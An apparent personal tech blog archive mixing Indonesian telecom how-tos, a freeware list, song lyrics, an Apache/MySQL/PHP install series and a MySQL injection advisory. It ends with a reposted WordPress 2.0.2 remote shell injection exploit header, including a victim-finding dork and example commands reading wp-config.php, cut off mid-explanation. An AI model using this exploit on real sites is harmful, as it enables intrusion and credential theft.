2. Buatlah Canvas dengan ukuran 1024x900 dengan pilihan content (background) adalah Transparent, agar tulisan pada file Microsoft Excel dapat terbaca / dicetak.
3. Buat Teks atau Gambar. Pada contoh ini, saya menggunakan kata 'RAHASIA'
4. Selanjutnya, agar tampilan 'Watermark' tidak 'menutup' tulisan yang terdapat pada file Microsoft Excel, maka 'Watermark' tersebut harus dibuat transparan sebesar kira-kira 35%. Caranya yaitu dengan memilih menu LAYER => LAYER STYLE => BLENDING OPTIONS => Opacity: 35%.
5. Untuk mempermanis, kita dapat memutar 'Watermark' 30* berlawanan arah jam agar tampilan 'Watermark' menjadi diagonal. Caranya dengan memilih menu IMAGE => ROTATE CANVAS => ARBITRARY => Angle: 30* CCW.
6. Simpan gambar yang telah kita buat sebagai file .jpg

CLICK HERE FOR MORE INFORMATION

Cara Pendaftaran E-Billing Telkomsel

2011-05-08T23:42:00.000+07:00

Saat ini Telkomsel telah menyediakan layanan E-Billing melalui Telkomsel Care. Layanan Telkomsel Care adalah layanan baru dari Telkomsel bagi pelanggan yang ingin menyampaikan permintaan atau pengaduan seputar layanan fitur Telkomsel melalui media internet.

Untuk registrasi E-Billing Tagihan Telkomsel Anda, Anda dapat melakukan langkah-langkah sebagai berikut:

1. Kirim SMS ke Telkomsel untuk mendapatkan Pin T-CARE dari Telkomsel Care.
FORMAT: pin[SPASI]tanggal_lahir_anda
FORMAT TANGGAL LAHIR: dd/mm/yyyy
KIRIM KE: 111 (untuk Kartu Halo) atau 116 (untuk Kartu Simpati dan As)
CONTOH: Misalkan Anda lahir di tanggal 18 Juni 1980, maka Anda dapat mengirim SMS sebagai berikut pin 18/06/1980 lalu mengirimkannya ke SMS Center sesuai dengan Kartu Anda.

Selanjutnya Anda akan menerima SMS berisikan PIN T-Care Anda.

Apabila dikemudian hari, Anda lupa atau ingin merubah PIN Care, Anda dapat mengakses melalui *111# (untuk Kartu Halo) atau *116# (untuk Kartu Simpati dan As). Selanjutnya, tekan 1 untuk menu T-Care, lalu tekan 1 kembali untuk menu PIN T-Care dan tekan 3 untuk menu Ganti PIN T-Care.

2. Apabila Anda telah memperoleh Pin T-CARE, maka langkah selanjutnya adalah mendaftarkan alamat email yang akan digunakan untuk menerima tagihan E-Billing Telkomsel Anda. Untuk melakukan Registrasinya dengan mengirimkan SMS dengan:

FORMAT: ebill[SPASI]reg[SPASI]alamat_email[SPASI]Pin_T_Care
KIRIM KE: 111
CONTOH: Misalkan alamat email Anda adalah emailku@hosting.com dan Pin T-CARE Anda adalah 1345, maka Anda dapat mengirimkan SMS sebagai berikut ebill reg emailku@hosting.com 1345 lalu mengirimkannya ke 111.

Selanjutnya Anda akan menerima email dari Telkomsel seperti dibawah ini:

CLICK HERE FOR MORE INFORMATION

Open Source (Freeware) Software List

2011-01-23T19:03:00.000+07:00

ANTIVIRUS TOOLS
- Spybot Search & Destroy
http://www.safer-networking.org/en/news/index.html
Spybot - Search & Destroy can detect and remove spyware of different kinds from your computer. Spyware is a relatively new kind of threat that common anti-virus applications do not cover yet. If you see new toolbars in your Internet Explorer that you didn't intentionally install, if your browser crashes, or if you browser start page has changed without your knowing, you most probably have spyware. But even if you don't see anything, you may be infected, because more and more spyware is emerging that is silently tracking your surfing behaviour to create a marketing profile of you that will be sold to advertisement companies. Spybot-S&D is free, so there's no harm in trying to see if something snooped into your computer, too :)

BURNING TOOLS
- CDBurner XP
http://www.cdburnerxp.se
CDBurnerXP is a free application to burn CDs and DVDs, including Blu-Ray and HD-DVDs. It also includes the feature to burn and create ISOs, as well as a multilanguage interface. Everyone, even companies, can use it for free. It does not include adware or similar malicious components.

- Express Burn
http://www.nch.com.au
Pembakar Cepat

CHARTING TOOLS
- Dia
http://live.gnome.org/Dia
Dia is an application for creating technical diagrams. Its interface and features are loosely patterned after the Windows program Visio. Features of Dia include multiple-page printing, export to many formats (EPS, SVG, CGM and PNG), and the ability to use custom shapes created by the user as simple XML descriptions. Dia is useful for drawing UML diagrams, network maps, and flowcharts.

FILE TOOLS
- Disk Digger
http://dmitrybrant.com
Tips 1: Dapat menyelamatkan tipe file tertentu. Caranya tentukan media penyimpanannya lalu pilih "Scan disk surface for trace of file". Lalu pilih tab "File Type For Search" dan beri tanda centang di tipe file yang ingin diselamatkan.

- Fideas File Private
http://www.apsec.de
Memproteksi File

- FreeEraser
http://www.codyssey.com
Penghancur Data

- Power GUI
http://www.powergui.org
Tips 1: Untuk mengetahui dan mencari informasi teraktual mengenai Windows PowerShell, Anda dapat mengakses http://blogs.msdn.com/powershell

Tips 2: Melalui website PowerGUI.org, Anda dapat menemukan beberapa daftar scripts siap pakai yang dapat digunakan untuk memperluas fungsi PowerGUI. Selain itu, Anda juga dapat menemukan panduan untuk menginstall script tersebut.

CLICK HERE FOR MORE INFORMATION

MP02 PICO PROJECTOR DETECTION PROBLEM

2010-11-14T22:14:00.001+07:00

SYMPTOM:
When I connect the Projector to my HP MiniNote, it still didn't recognize my Projector's USB. For your information, I'm using:

Projector's Brand: MP02 Pico Projector (or some said it was MP2 Pico Projector)
Notebook's Brand: HP MiniNote 2133
Operating System: Microsoft Windows Vista Service Pack 1

SOLUTION:

CLICK HERE FOR MORE INFORMATION

Not Afraid Lyric

2010-07-05T22:56:00.000+07:00

[Intro (during Chorus):]
Yeah, it's been a ride
I guess I had to, go to that place, to get to this one
Now some of you, might still be in that place
If you're tryin to get out, just follow me
I'll get you there

You could try and read my lyrics off of this paper before I lay 'em
But you won't take the sting out these words before I say 'em
Cause ain't no way I'ma let you stop me from causin mayhem
When I say 'em or do somethin I do it, I don't give a damn
what you think, I'm doin this for me, so fuck the world
Feed it beans, it's gassed up, if it thinks it's stoppin me
I'ma be what I set out to be, without a doubt undoubtedly
And all those who look down on me I'm tearin down your balcony

No if ands or buts, don't try to ask him why or how can he

CLICK HERE FOR MORE

How To Setting Up Internet Connection With Telkomsel Simpati Pede (Pra Bayar) And HuaYoui E1550 Modem

2010-03-16T21:01:00.001+07:00

These guides will be divided by 4 categories:
1. Activate and Setting Up Telkomsel Simpati Pede (Pra Bayar)
2. Install and Setting Up HuaYoui E1550 Modem
3. Activate and Setting Up Telkomsel Flash (Pra Bayar)
4. Other Informations

ACTIVATE AND SETTING UP TELKOMSEL SIMPATI PEDE (PRA BAYAR)

1. Registration the Telkomsel Simpati Pede (Pra Bayar) card
You can fill the form when Your Handphone started. Or You can send the Registration via SMS using these format:
DAFTAR
then send to 4444

2. Activate the GPRS
Send SMS with following format:
GPRS {Your 16 digit SIM Card number - look at the back of Your SIM Card}
then send to 6616

3. Activate the 3G
Send SMS with following format:
3G
then send to 3636

4. Activate the 300 MB/month for 6 month Bonus
Send SMS with the following format:
DATA BONUS
then send to 3636

You'll receive these notification if the activation process is success:
Paket Free Internet Access TelkomselFlash 300MB telah aktif. Paket berlaku s/d {This will be your expiration time for your bonus}. Ketik DATAINFO utk mengetahui status paket

CLICK HERE FOR MORE

Learn to install Apache 2, MySQL 5, PHP 5, phpMyAdmin 2 and Zend Optimizer 3 on Windows XP (Install Zend Optimizer)

2006-07-03T21:40:00.000+07:00

For the last step, we need an optimizer for all of our PHP code. So we’re going to use Zend Optimizer as it’s the industry standard and well it’s free and they also make a 32 bit version, so it will work on Windows.

So let’s start off by executing the installer that we downloaded in the beginning.

This will bring us to a window similar to this one, simple click on Next.

Next we must agree to Zend’s License Agreement, simply click on Yes after the agreement has been read.

Next the application would like to know where to install Zend, simply click on browse.

Find the new location, or type it in the URL bar. In this case we’re using “C:\server\Zend” as we’d like to keep everything in its own folder. Click OK then Next

Next we’ll need to select the type of web server we’re using. In this case we used Apache 2.x, so simply select Apache 2.x from the list and click on Next.

Next the installer would like to know where our “php.ini” file is installed. In this case it’s installed in the “c:\server\PHP” folder. So, click Browse button, and point it to c:\server\PHP.

This will look like after we have select the php.ini location

We’ll need to specify the location of Apache. In this case the location of Apache was “C:\server\Apache2.2”. After this has been confirmed or input correctly, click on Next.

This will look like after we have select the Apache location. Click Next

After that, the application will bring us to ready to install window. Simple click on Install and the installer will begin the installation of Zend Optimizer using our custom configurations.

This warning box telling us to stop the Apache web server before continuing the installation. Stop the Apache web server and click Yes to continue the installation

This warning box tell us that the installer fail to find the Apache services and told us to manually stop the Apache web server before continuing the installation. Since we've done already, just click OK to continue the installation

When it’s installing, we’ll see a window similar to this and will disappear automatically when finished.

This warning box tell us that the installer fail to find the Apache services and told us to manually start the Apache web server before continuing the installation. Start the Apache web server and click OK to continue the installation

Once everything is finished, we’ll get a window similar to this. Simply click on Finish and we’re done. Zend Optimizer is now installed in the location we provided and is configured using the settings we specified during installation.

Now we can test to see if Zend Optimizer is installed and running correctly. Let’s open our favorite browser and run the phpinfo() application, just like we did at PHP installation. Simply type in http://localhost/inpo.php as the URL and hit enter.

If you get a page similar to this (look closely at the highlighted word, the Zend Optimizer word), then everything went just fine and Zend Optimizer is now installed and working correctly.

<< Install phpMyAdmin

INDEX SHORTCUT

Learn to install Apache 2, MySQL 5, PHP 5, phpMyAdmin 2 and Zend Optimizer 3 on Windows XP (Install PHPmyAdmin)

2006-07-03T21:38:00.000+07:00

In this article we’re going to learn how to install phpMyAdmin with our new server tools so we can better manage our MySQL database. There are a few things in this article that may not seem correct or right and some users may have phpMyAdmin working very easily, it all depends on your setup.

First let’s start by extracting the files to the proper location. Start by opening the phpMyAdmin zip file we downloaded in the beginning. Extract all of these files into the “htdocs” folder under the folder name “phpMyAdmin”. This will help us to keep up with where it’s installed, so now once we’ve unzipped everything we could load it up by using our favorite browser and point it to :

http://localhost/phpMyAdmin/index.php

The error message that displayed above means that we didn't include MySQL library to PHP configuration

To adding MySQL library to PHP configuration, just follow these steps:
1. Open PHP configuration file (php.ini) at c:\server\PHP using your favorite text editor (such as notepad)
2. Search for this syntax: ;extension=php_mysql.dll
3. If you found it, just delete the comment character (;)
4. Save the file and restart the Apache webserver. After that, try to run the phpMyAdmin again from your browser
5. If it's come with the same errors, then it means Apache couldn't find libmysql.dll file (this file is require for php_mysql.dll). Actually, this file is located at c:\server\PHP
6. So, we must change the Windows path to that location.
7. Go to Control Panel and open the System icon (Start -> Control Panel -> System)
8. Go to the Advanced tab
9. Click on the 'Environment Variables' button
10. Look into the 'System variables' panel, and highlight Path variable by click on it
11. Click Edit button, and at the Variable value, at the end of the syntax, add this code:
;c:\server\PHP
12. Click OK and restart your computer
13. Try again to run the phpMyAdmin from your browser

This error message means that our login or password to connect to mysql database is wrong. In order for phpMyAdmin could connect to mysql database, we must supply the login and password at phpMyAdmin configuration file.

Almost all configurable data is placed in config.inc.php. This file only needs to contain the parameters you want to change from their corresponding default value in phpMyAdmin/libraries/config.default.php. If config.inc.php does not exist at the phpMyAdmin directory, just copy config.default.php from libraries directory to phpMyAdmin directory, and rename it to config.inc.php.

Locate this string: $cfg['PmaAbsoluteUri'] = '';

Inside the ' ' place the location of where phpMyAdmin is installed on the server. In this case we installed it within the root directory under its own folder name. So we’ll use “http://localhost/phpMyAdmin/” as our absolute URL location.

There are 3 authentication methods that we can use to connect to phpMyAdmin:

1. config method (the default method)
This method is the least secure, as it requires storing your MySQL username and password in the file on the server. Anyone who would find the directory to your phpMyadmin installation would then be able to access your databases. This is the default method, however.

If you use the 'config' authentication method, it is strongly recommended that you secure the directory in which phpMyAdmin is installed, such as adding password protect to phpMyAdmin directory. This extra step is not needed when using either the 'http' or 'cookie' authentication methods.

Locate this string: $cfg['Servers'][$i]['auth_type'] = 'config';
Locate this string: $cfg['Servers'][$i]['user'] = 'put your MySQL login here';
Locate this string: $cfg['Servers'][$i]['password'] = 'put your MySQL password here';

2. http method
These methods are more secure, as your username and password are not stored on the server in your configuration file. The 'http' option uses the Apache http authentication method.

Locate this string: $cfg['Servers'][$i]['auth_type'] = 'http';
Locate this string: $cfg['Servers'][$i]['user'] = '';
Locate this string: $cfg['Servers'][$i]['password'] = '';

3. cookie method (recommended method)
These methods are more secure, as your username and password are not stored on the server in your configuration file. The 'cookie' method uses cookies, and has the advantage that you can "Log Out" at the end of your session, deleting the cookie.

Locate this string: $cfg['Servers'][$i]['auth_type'] = 'cookie';
Locate this string: $cfg['Servers'][$i]['user'] = '';
Locate this string: $cfg['Servers'][$i]['password'] = '';
Locate this string: $cfg['blowfish_secret'] = 'fill anything here';

For the blowish_secret values, you can fill any alphabets, in example you can use 716e3c0.88759346, but, keep in mind that the maximum length seems to be 46 characters. The passphrase is just used internally to encrypt the password - you will not be prompted for it later.

After we've finished configuring phpMyAdmin, try to run phpMyAdmin again by using our favorite browser and point it to http://localhost/phpMyAdmin/index.php

This error tell us that mbstring library didn't load at PHP. Without mbstring extension, phpMyAdmin is unable to split strings correctly and it may result in unexpected results.

In order to load mbstring library, we must do:

1. Open PHP configuration file (php.ini) at c:\server\PHP using your favorite text editor (such as notepad)

2. Find this syntax:
;extension=php_mbstring.dll

3. Delete the comment character (;)

4. Save the file and restart the apache

5. Try to open up phpMyAdmin again

If you’re able to login with no errors, you'll get the result like the image above, but it will be a bit different depending on your language setting. I've use Indonesian language setting.

<< Install PHP

Install Zend Optimizer >>

INDEX SHORTCUT

Learn to install Apache 2, MySQL 5, PHP 5, phpMyAdmin 2 and Zend Optimizer 3 on Windows XP (Install PHP)

2006-07-03T21:37:00.000+07:00

In the last few articles we’ve gotten our basic server applications installed and running. This will give us a great foundation to continue with the next few applications. The next thing we’ll need to get installed is PHP, as this will be the language we’re going to use to develop with, and we can’t use PHP without having a PHP engine phrasing all our code.

We didn't use the PHP installer because it isn't the preferred method for installing PHP and it's not secure. So we prefer manually install the PHP.

1. First, we want to create PHP folder under our server directory, so we must create c:\server\PHP folder

2. Open the PHP Zip file we downloaded at the beginning of this project and extract all the files at c:\server\PHP. If you use Winzip, make sure you check "Use Folder Names" option

3. After you've extracted the files, you'll see these directory structure at PHP folder:

c:\server\PHP
|
+--dev
|   |
|   |-php5ts.lib
|
+--ext -- extension DLLs for PHP
|   |
|   |-php_bz2.dll
|   |
|   |-php_cpdf.dll
|   |
|   |-..
|
+--extras
|   |
|   +--mibs -- support files for SNMP
|   |
|   +--openssl -- support files for Openssl
|   |
|   +--pdf-related -- support files for PDF
|   |
|   |-mime.magic
|
+--pear -- initial copy of PEAR
|
|
|-go-pear.bat -- PEAR setup script
|
|-fdftk.dll
|
|-..
|
|-php-cgi.exe -- CGI executable
|
|-php-win.exe -- executes scripts without an opened command prompt
|
|-php.exe -- CLI executable - ONLY for command line scripting
|
|-..
|
|-php.ini-dist -- default php.ini settings
|
|-php.ini-recommended -- recommended php.ini settings
|
|-php5activescript.dll
|
|-php5apache.dll
|
|-php5apache2.dll
|
|-..
|
|-php5ts.dll -- core PHP DLL
|
|-...

4. After that, we need to create 2 new folder, and we can name it uploadtemp (it's for temporary directory for HTTP uploaded files) and sessiondata (it's for storing all the session files). So, it will be c:\server\PHP\uploadtemp and c:\server\PHP\sessiondata

5. The next step is to set up a valid configuration file for PHP, php.ini. There are two ini files distributed in the zip file, php.ini-dist and php.ini-recommended. We advise you to use php.ini-recommended, because it has been optimized the default settings in this file for performance and security. So copy php.ini-recommended and put it in the same folder (c:\server\PHP) with the name php.ini

6. We still need some customization at PHP configuration, so open php.ini with your favorite text editor, such as notepad. Find these strings and change the values according to these:

- variables_order = EGPCS      => The environment variables are hashed into the $_ENV
- register_long_arrays = On    => Enables registration of the older (and deprecated) long predefined array variables ($HTTP_*_VARS)
- register_argc_argv = On      => Enables registration of the $argv and $argc variables
- magic_quotes_gpc = On
- upload_tmp_dir = c:\server\PHP\uploadtemp      => after you've change the values, make sure you've delete the comment character (;) at the beginning of the syntax, to make it active
- session.save_path= "c:\server\PHP\sessiondata" => after you've change the values, make sure you've delete the comment character (;) at the beginning of the syntax, to make it active. If there's more than one of these syntax, just use one and uncommented it
- extension_dir = "c:\server\PHP\ext"

You can change all of the above configuration if you need to do so, but you must understand what you're about to do

7. We must tell PHP to locate the php.ini at c:\server\PHP by doing these:
  - Go to Control Panel and open the System icon (Start -> Control Panel -> System)
  - Go to the Advanced tab
  - Click on the 'Environment Variables' button
  - Look into the 'System variables' panel
  - Click on 'New' and enter 'PHPRC' as the variable name and the directory where php.ini is located as the variable value (c:\server\PHP)
  - Press OK and restart your computer

8. After we've finished configuring the PHP, we must configure the Apache webserver to work with PHP files. There is 2 way, by installing as a CGI binary or installing as an Apache module. Installing as a CGI binary will make our server is open to several possible attacks. So we'd prefer installing as an Apache module

9. Open Apache configuration file, just like this:

10. Add these lines at the very bottom:

LoadModule php5_module "c:/server/PHP/php5apache2.dll"
AddType application/x-httpd-php .php .htm .html
PHPIniDir "c:/server/PHP"

The first line will let Apache know the installation of PHP and the next two will let Apache know how to handle PHP files (sometimes, in html file, we can put PHP scripts on it, so we must also configure PHP to handle .htm and .html file).

11. Restart the Apache server. If the Apache server cann't started, then do:

  - open command prompt (Start -> Run -> Type "cmd", click OK)
  - Type "cd c:\server\Apache2.2\bin" and then press Enter button
  - Type "httpd -t" to see if there's an error on our Apache configuration
  - If the error said "httpd: Syntax error on line 486 of C:/server/Apache2.2/conf/httpd.conf: Cannot load C:/server/PHP/php5apache2.dll into server: The specified module could not be found", you can continue on the next steps (the line number can be different, though). Otherwise, you must check your Apache configuration again by examine the error logs

12. By looking at the error messages, it seems that there's something missing at the php5apache2.dll module. After searching on the net, i have found a solution (Thanks to Steffen, http://www.apachelounge.com webmaster). Just download these file:
  - http://www.apachelounge.com/download/mods/php5apache2.dll-php5.1.x.zip or at my backup server at http://other.monx007.com/tools/php5apache2.dll-php5.1.x.zip (it's 05/05/2006 version). You must check the file at http://www.apachelounge.com first for the newest version
  - if you haven't installed the .NET framework, then you must also download http://download.microsoft.com/download/d/3/4/d342efa6-3266-4157-a2ec-5174867be706/vcredist_x86.exe or you can find the link from http://www.microsoft.com/downloads/details.aspx?familyid=32BC1BEE-A3F9-4C13-9C99-220B62A191EE&displaylang=en

13. After that, just read the instruction file (Readme.txt), or, i can describe it here anyway:
- Copy php5apache2.dll to c:\server\PHP
- Copy httpd.exe.manifest to c:\server\Apache2.2\bin
- If you haven't installed the .NET framework, then run vcredist_x86.exe that we've downloaded before (Click Yes to Accept the agreement).

14. Try to start the apache again. If it cann't started, check the Apache configuration file just like steps 11.

15. If the Apache start successfully, we must test to see if PHP is installed correctly

16. We’ll want to create a file in the htdocs folder located in the main folder of Apache. This is where all of our web documents are going to be stored. Create a new file in this folder can name it inpo.php. Be sure that it saves with a .php extension and not .php.txt or whatever you’ll use to create the file. Once the phpinfo.php file has been created, open it up and place the following code within it.

<?php phpinfo(); ?>

Save it, close the file and then open your favorite browser and type this in the location bar.

http://localhost/inpo.php

17. If you see the following page (like below image), then PHP is installed and setup correctly on your server.

<< Install MySQL

Install phpMyAdmin >>

INDEX SHORTCUT

Learn to install Apache 2, MySQL 5, PHP 5, phpMyAdmin 2 and Zend Optimizer 3 on Windows XP (Install MySQL)

2006-07-03T21:35:00.000+07:00

Open up the MySQL zip file that we've downloaded. Inside this zip file will be an installer file, named “setup.exe”. This file can be extracted or ran just where it is. Double click or ran the setup file

Once it’s extracted and has been started, we’ll get a screen similar to this.

Click >> Next

The next screen we’ll see will be the selection for the setup type for our installation. We’re going to select Custom because we have a few custom requests for the installer to perform.

Click >> Next

We will need to change the location for the installation, so we’ll just select MySQL Server and then click on the Change button located in the bottom right.

Simply type in the location, in this case we’ll use “C:\server\mysql” as this is where the rest of our server applications are being installed. Then click on Ok.

This will look like after we have customize the folder

Click >> Next

We are now ready to install, just click on Install button

When it’s installing, we’ll see a window similar to this and will disappear automatically when finished.

This is to setup an account on MySQL.com for updates and so on, we’ll just select Skip for the time being and we can take care of this later.

Click >> Next

Now we get to configure the server to run the way we’d like for it to run. Just click Finish button

This screen is the start page for the Server Instance Configuration Wizard.

Simply click on Next.

We’ll want to select Standard Configuration from the next screen. Remember this is for new installations of MySQL. Users that already have MySQL installed and are upgrading, please select Detailed Configuration.

Click >> Next

Now we get to make a few choices about our server, for this project we’ll use “Install As Windows Service” and make sure “Launch the MySQL Server automatically” option is checked. This will insure the MySQL server is started if it ever shuts down, or the system ever restarts.

Click >> Next

Next we’ll need to select a root password, simply type a password you’d like to use for root access and let’s write it down so we don’t forget it. Also remember to check “Enable root access from remote machines” ONLY IF you want to edit anything from a remote location later on.

The next screen is simply the start screen for the configuration utility, letting us know what it’s about to perform. Simply click on Execute.

When Start Service is error, try to change the name of the service in previous screen (Choose Detailed Configuration)

If there's an error like this screen, then, it maybe because your Computer Firewall block TCP port 3306 for connections. Just go to Start Program => Control Panel => Windows Firewall. If you haven't encounter this problem, you can skip to the next step HERE

After that, click Exceptions tab, and click Add Port button

Just insert:
Name: MySQL Connections
Port Number: 3306

and make sure, you choose TCP

Click >> OK

Click OK again to exit Windows Firewall options

Back to the MySQL Configuration Screen, press retry to continue the configuration

Once everything is finished it will look like this. This give a little information about what has happened and show that everything goes well.
Click Finish button

Once we’ve finished the installation, we can run MySQL application to make sure that MySQL is installed and working properly.

Find the folder in the start menu where MySQL is located and launch the “MySQL Command Line Client”

Once it's open, simply enter the password we just set and if the client allows access with no errors, MySQL is now installed and working properly. There is no need to leave this command line client open, simply type “exit” and enter. This should close the client out.

We now have finished installing MySQL and it’s working correctly. We can now move onto another application.

<< Install Apache

Install PHP >>

INDEX SHORTCUT

Learn to install Apache 2, MySQL 5, PHP 5, phpMyAdmin 2 and Zend Optimizer 3 on Windows XP (Install Apache)

2006-07-03T21:32:00.000+07:00

First and foremost we need to get Apache installed and operational before we can install anything else, or they will not work correctly. So let’s begin by installing Apache.

Locate the Apache installer we downloaded earlier and double click on it. This will launch the Apache automated installer for us, there are a few options we’ll need to set along the way, so keep up.

The first few screens are Apache’s configuration, configuring windows to install Apache. This will only take a second and then we’ll be ready to begin.

This first screen we’ll see after the configuration will be the front of the installer. Basically this just gives you a little information about what we’re about to install.

Click >> Next

Next we’ll have a license agreement that we must accept to continue the installation of Apache.

Select “I accept the terms in the license agreement” >> Click Next

The next screen we have basically explains what we’re installing and some useful information about the application and where we can locate updates and so on.

Click >> Next

Next we have the server information. This is just basic configurations for the server and doesn’t take any time at all.

Network Domain (e.g. somenet.com): localhost
Server Name (e.g. www.somenet.com): localhost
Administrator’s Email Address: Your email here

Then we’ll select “Run as a service for all users – Recommended”. This will start Apache as a service and run it automatically when the system reboot. This would be the best solution for users that want something quick and simple, no maintenance needed.

Click >> Next

Next we have the selection of how we’d like to install it. I’d prefer my documents be in another location as I’d like to organize the rest of my server applications in one folder in root. So we’ll select Custom for this project and continue.

Click >> Next

From the next window that appears, select “Apache HTTP Server” and click on the “Change…” button located in the bottom right.

This will bring up a window similar to this one where we’re able to change the location of the installation folder. I prefer all of my server applications to be in “C:\server\Apache2.2” so I can organize all of them in one folder. So we’ll change the default of “C:\Program Files\Apache Software Foundation\Apache2.2\” to “C:\server\Apache2.2\”. Remember to use an ending back slash.

Click >> Ok

This will look like after we have customize the folder

Click >> Next

After that, the application will bring us to ready to install window. Simple click on Install and the installer will begin the installation of Apache using our custom configurations.

When it’s installing, we’ll see a window similar to this and will disappear automatically when finished.

If after the installation, there's a popup window show up (it's a windows firewall warning) that ask whether we want to block or unblock the Apache Port, just choose Unblock option

Once everything is finished, we’ll get a window similar to this. Simply click on Finish and we’re done. Apache is now installed in the location we provided and is configured using the settings we specified during installation.

Now we can test to see if Apache is installed and running correctly. Let’s open our favorite browser and give it a try. Simply type in http://localhost/ as the URL and hit enter.

If you get a page similar to this, then everything went just fine and Apache is now installed and working correctly.

Remember that we setup Apache to run as a service so the there's a time when the server needs to be stop or restarted manually, example when we changes httpd.conf file. This file contains all the configurations for the server.

Now we can edit and add pages to our new server by going to “C:\server\Apache2.2\htdocs”. This will be where all the web pages will be located and should be stored. This can be changed by configuring the location in the httpd.conf file. Remember to restart if anything is changed within this file.

<< Main Section

Install MySQL >>

INDEX SHORTCUT

Learn to install Apache 2, MySQL 5, PHP 5, phpMyAdmin 2 and Zend Optimizer 3 on Windows XP (Main Section)

2006-07-03T21:27:00.000+07:00

Note: This article will be released in sections. Learning how to install Apache, PHP, MySQL, phpMyAdmin and Zend Optimizer is one of the most important parts of running a web server from any machine. In this tutorial we’ll learn how to install all of these resources in Windows XP Service Pack 2.

Requirement

1. Apache Web Server (Win32 Binary) – This is the web server we’ll be use for this project.
   - Apache Home Page: http://www.apache.org/
   - Apache HTTPD Web Server Download Page: http://httpd.apache.org/download.cgi
   - Apache Version Used: Apache 2.2.2 Win32 Binary

2. PHP Windows Zipped Version – This will be used to develop under the PHP programming language.
   - PHP Home Page: http://www.php.net/
   - PHP Download Page: http://www.php.net/downloads.php
   - PHP Version Used: PHP 5.1.4 Zipped Version

3. MySQL Database Server – This will be used to run our MySQL databases.
   - MySQL Home Page: http://www.mysql.com/
   - MySQL Download Page: http://dev.mysql.com/downloads/mysql/5.0.html
   - MySQL Version Used: MySQL 5.0.22 Win32

4. phpMyAdmin Database Manager – This will be used to manage our MySQL databases.
   - phpMyAdmin Home Page: http://www.phpmyadmin.net/
   - phpMyAdmin Download Page: http://www.phpmyadmin.net/home_page/downloads.php
   - phpMyAdmin Version Used: phpMyAdmin 2.8.1 Zipped Version

5. Zend Optimizer – We’ll use this to optimize all of the PHP development we’ll be doing.
   - Zend Optimizer Home Page: http://www.zend.com/
   - Zend Optimizer Free Download Page: http://www.zend.com/store/free_download.php?pid=13
   - Zend Optimizer Version Used: Zend Optimizer 3.0.1 Windows

Start off by downloading each of the applications and scripts and save them to a folder on your desktop or somewhere else that will be easily accessible through out this tutorial.

Now that we have everything that we need, we can continue on to the next section (Install Apache)

Overview

Programs Used
Apache - Apache 2.2.2 Win32 Binary (For Windows)
PHP - PHP 5.1.4 Windows Installer (For Windows)
MySQL - MySQL 5.0.22 Win32 (For Windows)
phpMyAdmin - phpMyAdmin 2.8.1 Zipped Version
Zend Optimizer - Zend Optimizer 3.0.1 For Windows

Download Locations
Apache: http://httpd.apache.org/download.cgi
PHP: http://www.php.net/downloads.php
MySQL: http://dev.mysql.com/downloads/mysql/5.0.html
phpMyAdmin: http://www.phpmyadmin.net/home_page/downloads.php
Zend Optimizer: http://www.zend.com/store/free_download.php?pid=13

Install Apache >>

INDEX SHORTCUT

MySQL addresses SQL injection vulnerability

2006-06-05T20:14:00.000+07:00

By Joe 'Zonker' Brockmeier

MySQL AB has issued updates to its MySQL 4.1 and 5.0 series to address a SQL injection vulnerability. MySQL's action follows the PostgreSQL project's release last week to address the same issues.

The vulnerability was discovered by the PostgreSQL project and passed to MySQL via the Open Source Database Consortium. The vulnerability lies in the mysql_real_escape_string() function. When unsanitized user-supplied data, such as information taken from a Web form, is stored in a MySQL database, it's possible for a malicious user to supply a malformed multibyte character that would cause MySQL to execute arbitrary code. According to the announcements:

"An SQL-injection security hole has been found in multibyte encoding processing. An SQL-injection security hole can include a situation whereby when inserting user supplied data into a database, the user might inject his own SQL statements that the server will execute. With regards to this vulnerability discovered, when character set unaware escaping is used (e.g., addslashes() in PHP), it is possible to bypass it in some multibyte character sets (e.g., SJIS, BIG5 and GBK). As a result, a function like addslashes() is not able to prevent SQL injection attacks."

All releases in the 4.1 and 5.0 series prior to 4.1.20 and 5.0.22 are vulnerable. Users are advised to upgrade to 4.1.20 or 5.0.22 immediately if possible.

For users that are not able or willing to upgrade to MySQL 4.1.20 or 5.0.22, it's possible to tell MySQL to use SQL standard compatibility mode with regard to backslashes. You can set this by using SET sql_mode='NO_BACKSLASH_ESCAPES'; while the MySQL server is running, by using the --sql-mode=NO_BACKSLASH_ESCAPES option when starting the MySQL server, or including this line in your MySQL configuration file:

PHP Code:
sql-mode=NO_BACKSLASH_ESCAPES

The configuration file should be my.cnf on Linux systems. It's found under /etc/mysql on Debian and Ubuntu systems, and under /etc on Red Hat and Fedora systems.

Updated packagesare available from MySQL immediately, and Linux distributions should be issuing updated versions of MySQL soon.

Remote Shell Injection Exploit At WordPress 2.0.2 (Cache)

2006-06-01T11:37:00.000+07:00

Remote Shell Injection Exploit At WordPress 2.0.2 (Cache)

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "--------------------------------------------------------------------\r\n";
echo "| WordPress <= 2.0.2 'cache' shell injection exploit |\r\n";
echo "| by rgod rgod@autistici.org |\r\n";
echo "| site: http://retrogod.altervista.org |\r\n";
echo "| dork: inurl:wp-login.php Register Username Password -echo |\r\n";
echo "--------------------------------------------------------------------\r\n";

/*
this works:
regardless of all php.ini settings,
if user registration is enabled,
against an empty or weak MySQL DB password (read explaination for details...)
*/

if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS \r\n";
echo "host: target server (ip/hostname) \r\n";
echo "path: path to WordPress \r\n";
echo "cmd: a shell command \r\n";
echo "user/pass: you need a valid user account \r\n";
echo "Options: \r\n";
echo " -D[dicrionary] specify a textfile and try dictionary attack \r\n";
echo " -p[port]: \" a port other than 80 \r\n";
echo " -P[ip:port]: \" a proxy \r\n";
echo "Examples: \r\n";
echo "php ".$argv[0]." localhost /wordpress/ your_username password ls -la -Ddic.txt\r\n";
echo "php ".$argv[0]." localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81\r\n";
echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
die;
}

EXPLANATION:

I) wordpress stores some user informations inside cached files in wp-content/cache/userlogins/ and wp-content/cache/users/ folders, they are php files. Normally they look like this:

<?php
